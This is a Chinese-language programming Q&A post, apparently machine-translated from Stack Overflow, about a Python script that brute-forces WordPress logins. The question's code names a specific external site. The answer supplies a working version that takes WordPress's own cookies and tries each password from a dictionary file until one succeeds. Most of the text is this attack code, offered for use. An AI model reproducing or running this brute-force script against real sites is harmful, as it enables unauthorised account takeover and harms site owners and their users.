我一直在做一个名为web-map的程序。 它扫描网站的漏洞。 但是我在使用wordpress登录时遇到了一些麻烦。 这是强制登录的代码:
def brute_login(tgt, dictionary):
s = requests.Session()
pass_found = False
user = raw_input("User: ")
intent = 0
tgt = tgt+"/wp-login"
f = open(dictionary, 'r')
for word in f.readlines():
password = word.strip('\n')
intent+=1
payload = {'log': user, 'pwd': password, 'redirect_to': 'TARGET_URL/wp-admin', 'testcookie': '1', 'wp-submit': 'Access'}
print '[+] Trying with user: '+str(user)+' and password: '+str(password)+'\ttry: '+str(intent)
s.post(tgt, data=payload)
data = s.get("http://gerion.info/wp-admin").text
if 'Escritorio' in data or 'Desktop' in data:
print '[*] Password found: '+password
pass_found = True
else:
pass
我希望你能帮助我,谢谢!!
答案 0 :(得分:3)
好的,我找到了解决方案。 @payne问题是我无法对wordpress管理页面进行身份验证。 解决方案是让wordpress由他自己的饼干设置。 这是最终的代码:
def brute_login(tgt, dictionary):
s = requests.Session()
s.get(tgt)
user = raw_input("User: ")
intent = 0
tgt = tgt + "/wp-login.php"
passwords = []
with open(dictionary, 'r') as f:
passwords = f.read().rsplit('\n')
for password in passwords:
intent += 1
payload = {'log': user,'pwd': password}
print'[+] Trying with user: %s and password: %s\ttry: %s' % (user, password, intent)
data = s.post(tgt, data=payload)
if not 'ERROR' in data.text:
print '[*] Password found: '+password
exit(0)